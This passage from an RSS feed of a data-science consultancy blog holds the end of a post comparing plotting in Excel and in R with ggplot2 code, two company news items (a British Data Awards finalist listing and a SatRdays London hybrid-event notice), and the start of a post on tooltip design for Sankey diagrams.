&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(axis.text.x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(angle &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;45&lt;/span&gt;, vjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/R-scatter-facet.png" alt="Scatter plot generated with R, with different panels for different countries" style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;We have also utilised the &lt;code&gt;axis.text.x&lt;/code&gt; element to adjust the angle and
position of the x-axis labels to ensure that they are legible. Are you
able to create this in Excel without copying and pasting the graphs? If
so, please do show us how.&lt;/p&gt;
&lt;p&gt;Now, let’s proceed to create a histogram using Excel and R. Looking at
the &lt;code&gt;theme()&lt;/code&gt; function alone, we can see that R has a lot more features
available that we are able to modify, such as axes text, fonts, legend
size and grid lines. As a data enthusiast, which graph looks more
aesthetically pleasing to you?&lt;/p&gt;
&lt;h3 id="histogram-plot"&gt;Histogram Plot&lt;/h3&gt;
&lt;h4 id="excel-1"&gt;Excel&lt;/h4&gt;
&lt;p&gt;The histogram generated below was a bit more time-consuming. Firstly, we
had to change the size of the bars in a normal bar graph in order to
generate a histogram. The colour of each column had to be
selected and applied manually. Adding a legend to this plot was also a manual
process. Looking at this plot, is this something that you are able to
easily recreate?&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/histogram_plot.png" alt="Histogram graph generated with Excel." style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;Now, let’s generate a histogram using R and its {ggplot2} functions.&lt;/p&gt;
&lt;h4 id="r-1"&gt;R&lt;/h4&gt;
&lt;p&gt;Once again, it is evident that we can easily control all of the
variables and aesthetics of the histogram plot generated using &lt;code&gt;ggplot()&lt;/code&gt;.
Here we used a new function,
&lt;a href="https://sjmgarnier.github.io/viridis/reference/scale_viridis.html" rel="external"&gt;&lt;code&gt;scale_fill_viridis()&lt;/code&gt;&lt;/a&gt;
from the {viridis} package, which allowed us to modify the fill colours
of the histogram bars. We also used the &lt;code&gt;theme_classic()&lt;/code&gt;
function to create a classic-looking plot with x- and y-axis lines
and no gridlines. Finally, we edited the size, colour and font of the text
on the axes (&lt;code&gt;axis.text&lt;/code&gt;).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Highest_profit)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_histogram&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Country)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Yearly profit (in million dollars)&amp;#34;&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Count&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_viridis&lt;/span&gt;(discrete &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; TRUE) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_classic&lt;/span&gt;()&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Country&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;, family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;serif&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/R-histogram.png" alt="Histogram plot generated with R" style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;Now, let’s move on and generate our last plot.&lt;/p&gt;
&lt;h3 id="line-plot"&gt;Line Plot&lt;/h3&gt;
&lt;h4 id="excel-2"&gt;Excel&lt;/h4&gt;
&lt;p&gt;The line plot was the most complex plot to create. Firstly, when
generating the line graph, it was evident that the data within the year
column had to be rearranged in ascending order; otherwise Excel would put the
earlier years after the later years. We were also unable to
plot each country as a separate line on the same graph,
as some countries did not have data for all the years. After a lot of
frustration with Excel we attempted to create a very basic line plot in
R.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/line_plot.png" alt="Line graph generated with Excel." style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;h4 id="r-2"&gt;R&lt;/h4&gt;
&lt;p&gt;With only three lines of code and very little frustration, we were
easily able to recreate the line graph above in R.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Year, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Number_movies)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_line&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Country)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Years&amp;#34;&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of movies produced&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/R-basic-line.png" alt="Basic line plot generated with R" style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;Now, let’s add some more aesthetics to our plot as we did for the
previous ones by changing the font size (&lt;code&gt;axis.title&lt;/code&gt; and &lt;code&gt;axis.text&lt;/code&gt;),
changing the panel border (&lt;code&gt;panel.border&lt;/code&gt;), as well as editing the
legend size (&lt;code&gt;legend.key.size&lt;/code&gt;). Here we decided to use the
&lt;code&gt;theme_dark()&lt;/code&gt; function in R to create a dark background, which is
commonly used to make thin coloured lines pop out.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies_data, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Year, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Number_movies)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_line&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Country)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Years&amp;#34;&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of movies produced&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Country&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_dark&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.border &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;, linewidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;, face &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bold&amp;#34;&lt;/span&gt;, family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Arial&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;, family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Arial&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.key.size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unit&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.50&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;cm&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/graphics/R-dark-line.png" alt="Line plot generated with R, with a dark background and thick border." style="width: 700px; display: block; margin-left: auto; margin-right: auto;"/&gt;
&lt;p&gt;When comparing R and Excel, it’s important to define the level of
information you are looking for. If you want to run basic statistics
quickly, Excel might be the better choice. If you are interested in
creating a very basic graph, Excel may be the better choice, due to its
easy point-and-click system. Before plotting a graph, ask yourself: “How
detailed does my visualisation need to be? Am I creating a plot for a
publication or not?” In Excel we can easily select a
chunk of data and make a simple chart. However, when making more
comprehensive plots, using Excel can be extremely frustrating and
time-consuming. It all comes down to what you need your graphics to do. For
those planning to publish large amounts of complicated data, spending
the time in R to create impressive visual representations will certainly
be worth your time. It is also clear that R is not difficult, and gives
you the option to customise more than Excel.&lt;/p&gt;
&lt;p&gt;R and Excel are beneficial in different ways. Excel is easier to learn at
first and is the go-to program when we are first exposed to computers, and some
of us end up stuck there. However, R is designed to be
reproducible, which is clearly of high importance. It’s not a question of
choosing between R and Excel, but of deciding which program to use for
different needs.&lt;/p&gt;
&lt;p&gt;If you’re interested in learning how to create graphs using R, then
attend our &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data visualisation with
ggplot2&lt;/a&gt;
course.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>We’re a British Data Awards 2023 Finalist</title><link>https://www.jumpingrivers.com/blog/britsh-data-awards-finalists/</link><pubDate>Tue, 11 Apr 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/britsh-data-awards-finalists/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/britsh-data-awards-finalists/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/britsh-data-awards-finalists/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We’re delighted to announce that we’ve been named a Finalist in the British Data Awards
2023.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://predatech.co.uk/british-data-awards/" rel="external"&gt;British Data Awards&lt;/a&gt; is an annual quest to discover and celebrate data success stories.
Organisations taking part this year include FTSE 100 heavyweights, public sector
pioneers, technology unicorns, fast-growing scale-ups, essential Not-For-Profits, and
everything in between.&lt;/p&gt;
&lt;p&gt;A record 226 entries were received this year which means that competition to be named a
Finalist proved to be particularly tough, so we’re especially pleased to be announced as a
Finalist.&lt;/p&gt;
&lt;p&gt;Jason Johnson, Co-Founder of &lt;a href="https://predatech.co.uk/" rel="external"&gt;Predatech&lt;/a&gt; and British Data Awards judge said: “Judging the
British Data Awards this year wasn’t easy given the high standard of entries. All our Finalists
should be incredibly proud of their data success stories and for helping to showcase the best
that the world of data has to offer. I look forward to celebrating your achievements in May.”&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-british-data-awards-finalists"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="our-nominations"&gt;Our nominations&lt;/h3&gt;
&lt;h4 id="data-for-good-consulting-initiative-of-the-year-sponsored-by-the-dot-collective"&gt;Data for Good Consulting Initiative of the Year (sponsored by The Dot Collective)&lt;/h4&gt;
&lt;p&gt;Jumping Rivers has been working on a project for the World Health Organisation Europe, streamlining and maintaining their &lt;a href="https://worldhealthorg.shinyapps.io/EURO_COVID-19_vaccine_monitor/" rel="external"&gt;COVID19 vaccination programme monitoring application&lt;/a&gt;. You may have read a little about this project in our recent blogs on &lt;a href="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/" rel="external"&gt;offloading Shiny&amp;rsquo;s workload&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/" rel="external"&gt;working smarter, not harder&lt;/a&gt; with automated workflows. This is a great example of data being utilised to track and develop global initiatives. The maintenance that Jumping Rivers has performed on this app allows it to be quick, flexible and robust to changes in the data. The automation also allows the staff at the WHO/Europe to concentrate their efforts on important initiatives, rather than spending their time cleaning and managing data.&lt;/p&gt;
&lt;img src="who-project.png" alt="A screenshot of a map of Europe from the WHO/Europe COVID19 vaccination programme monitoring app." style="width: 100%" /&gt;
&lt;h4 id="rising-star-of-the-year"&gt;Rising Star of the Year&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://www.linkedin.com/in/jwalton93/" rel="external"&gt;Jack Walton&lt;/a&gt; is a finalist for the Rising Star of the Year award! Jack is very community driven, leading data science meetups and contributing to open source projects and online support networks. He inhabits a unique space in the industry, between data science and data engineering, carving out a position for himself acting as an intermediary between the two areas, and allowing for greater collaboration across the company.&lt;/p&gt;
&lt;p style="text-align:center;"&gt;&lt;img src="jack-walton.jpg" alt="A photo of Jack Walton smiling in front of a wall." style="width: 40%" align="center" /&gt;&lt;/p&gt;
&lt;h3 id="quote-from-a-company-spokesperson"&gt;Quote from a company spokesperson&lt;/h3&gt;
&lt;p&gt;The British Data Awards 2023 will announce Winners across some 22 categories. A number
of Highly Commended awards will also be presented. This year, ‘Data for Good Initiative of
the Year’ and ‘Innovation of the Year’ were the categories that received the most entries.
Other categories include ‘Data Leader of the Year’ and ‘Technology Company of the Year’,
while new categories including ‘Climate Change Initiative of the Year’ were introduced to
help showcase and celebrate the work of a diverse group of organisations.
The British Data Awards 2023 judging panel included:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Roshan Awatar: Group Director, Data &amp;amp; Analytics at Sky&lt;/li&gt;
&lt;li&gt;Lynne Bailey: Chief Data Officer at KPMG UK&lt;/li&gt;
&lt;li&gt;Neil Carden: CEO at Forth Point | A Blend360 Company&lt;/li&gt;
&lt;li&gt;Dr Sophie Carr: Founder at Bays Consulting&lt;/li&gt;
&lt;li&gt;Caroline Carruthers: CEO at Carruthers and Jackson&lt;/li&gt;
&lt;li&gt;Christina Finlay: Director of Data &amp;amp; Analytics, Nest&lt;/li&gt;
&lt;li&gt;Roxane Heaton: Chief Information Officer at Macmillan Cancer Support&lt;/li&gt;
&lt;li&gt;Natalie Jakomis: Director of Data &amp;amp; Analytics at Rightmove&lt;/li&gt;
&lt;li&gt;Jason Johnson: Co-Founder at Predatech&lt;/li&gt;
&lt;li&gt;Natasha Lauer: Head of Marketing at Soda&lt;/li&gt;
&lt;li&gt;Dr Jo Watts: CEO &amp;amp; Founder at effini&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Finalists will be celebrated, and Winners announced, at an awards ceremony taking place in
London on the 11th May.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/britsh-data-awards-finalists/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London is now Hybrid!</title><link>https://www.jumpingrivers.com/blog/virtual-satrdays-london/</link><pubDate>Thu, 06 Apr 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/virtual-satrdays-london/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/virtual-satrdays-london/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/virtual-satrdays-london/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;SatRdays London is fast approaching, and we have a couple of exciting announcements to share with you!&lt;/p&gt;
&lt;h3 id="full-program-available-now"&gt;Full program available now&lt;/h3&gt;
&lt;p&gt;The full list of speakers and their abstracts can now be found in a downloadable program on our &lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;, along with the schedule for the day and the registration options.&lt;/p&gt;
&lt;h3 id="registration-deadline-extension"&gt;Registration deadline extension&lt;/h3&gt;
&lt;p&gt;The registration deadline has now been extended to the &lt;strong&gt;21st April&lt;/strong&gt;, so you can &lt;a href="https://satrday-london-2023.jumpingrivers.com/#registration" rel="external"&gt;register&lt;/a&gt; all the way up to the day before the event!&lt;/p&gt;
&lt;h3 id="virtual-tickets-now-available"&gt;Virtual tickets now available&lt;/h3&gt;
&lt;p&gt;Most excitingly, we are pleased to announce that this will now be a hybrid event! If you aren&amp;rsquo;t able to make it to London for the day, there&amp;rsquo;s no need to miss out. You can sign up in the same place (via the &lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;website&lt;/a&gt;), and select the &amp;ldquo;Virtual only&amp;rdquo; option! You will then be able to watch live on the day, and join in on the Q&amp;amp;A sessions with our speakers.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re really looking forward to hosting you all, whether at the incredible &lt;a href="https://en.wikipedia.org/wiki/Bush_House" rel="external"&gt;Bush House&lt;/a&gt; in London or virtually, so please book your place now to make sure you don&amp;rsquo;t miss out on our excellent line-up of speakers. We have a great range of talk topics, from R in journalism and MLOps, to sustainability and EDI in the R project, to air quality analysis and scrutinising government spending, and much more. There will be something for everyone at this month&amp;rsquo;s SatRdays London event!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/virtual-satrdays-london/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Optimising tooltip design with modern CSS</title><link>https://www.jumpingrivers.com/blog/optimising-tooltip-design-modern-css/</link><pubDate>Thu, 30 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/optimising-tooltip-design-modern-css/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/optimising-tooltip-design-modern-css/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/optimising-tooltip-design-modern-css/assets/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;link rel="stylesheet" href="assets/interactive.css"&gt;
&lt;script src="assets/interactive.js" defer&gt;&lt;/script&gt;
&lt;p&gt;In my blog post on &lt;a href="https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/"&gt;improving the responsiveness of Shiny applications&lt;/a&gt; I mentioned a recent project I was involved with as part of a collaboration with &lt;a href="https://utahtech.edu/" rel="external"&gt;Utah Tech University&lt;/a&gt;. Part of that project involved the construction of interactive &lt;a href="https://en.wikipedia.org/wiki/Sankey_diagram" rel="external"&gt;Sankey&lt;/a&gt; (or to be extra-precise &lt;a href="https://en.wikipedia.org/wiki/Alluvial_diagram" rel="external"&gt;&amp;ldquo;alluvial&amp;rdquo;&lt;/a&gt;) diagrams using the &lt;a href="https://d3js.org/" rel="external"&gt;d3 JavaScript library&lt;/a&gt;. One of the requirements was that the user could hover over a link or node in the diagram and see all the connections to or from that link or node highlighted. The image below shows a cropped section of one such Sankey, constructed using data from the diamonds dataset in R&amp;rsquo;s {ggplot2} package. The data used was handy for illustrative purposes here - whether a Sankey diagram is a good way of visualising that data is largely moot for the discussion that follows.&lt;/p&gt;
&lt;figure aria-label="A close-up of part of a Sankey diagram"&gt;
&lt;img src="assets/background.jpg" srcset="assets/background@2x.jpg 2x" aria-hidden="true" /&gt;
&lt;/figure&gt;
&lt;p&gt;While colour-highlighting can be a great way of emphasizing part or parts of a chart or diagram, it doesn&amp;rsquo;t usually add precise information, which was important to the client. To add this precise information we used tooltips. But to make them as effective as possible we had to spend a bit of time refining their design.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-optimising-tooltip-design-modern-css"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-power-of-tooltips"&gt;The power of tooltips&lt;/h2&gt;
&lt;p&gt;Tooltips typically give you precise information next to your cursor or where you&amp;rsquo;ve just tapped. That is to say, where you happen to be looking. This is great because, to put it bluntly, your peripheral vision is rubbish. Don&amp;rsquo;t worry, mine is too. As Jeff Johnson outlines in &lt;a href="https://www.elsevier.com/books/designing-with-the-mind-in-mind/johnson/978-0-12-818202-4" rel="external"&gt;Designing with the Mind in Mind&lt;/a&gt; (third edition, chapter 5), the centre of our visual field - the fovea - contains around 158,000 cone cells per square millimetre and around half of the visual cortex is then devoted to processing information coming from the fovea. Yet the fovea makes up only about 1% of the retina! The rest of the retina contains &lt;em&gt;only&lt;/em&gt; around 9,000 cones per square millimetre and, on top of that, data from these cells is compressed (multiple cones and rods connect to each ganglion cell) before being sent to the brain.&lt;/p&gt;
&lt;p&gt;Peripheral vision is useful for detecting &lt;em&gt;motion&lt;/em&gt;. That&amp;rsquo;s great if you want to see that apex predator sneaking up on you or that application in your macOS Dock that really wants you to give it some attention (thanks Apple! 🙄). So peripheral vision guides attention. By using tooltips close to the cursor you don&amp;rsquo;t have to worry about your user&amp;rsquo;s focus and attention having to dart from one bit of the screen to another (and maybe getting lost on the outward or return journey).&lt;/p&gt;
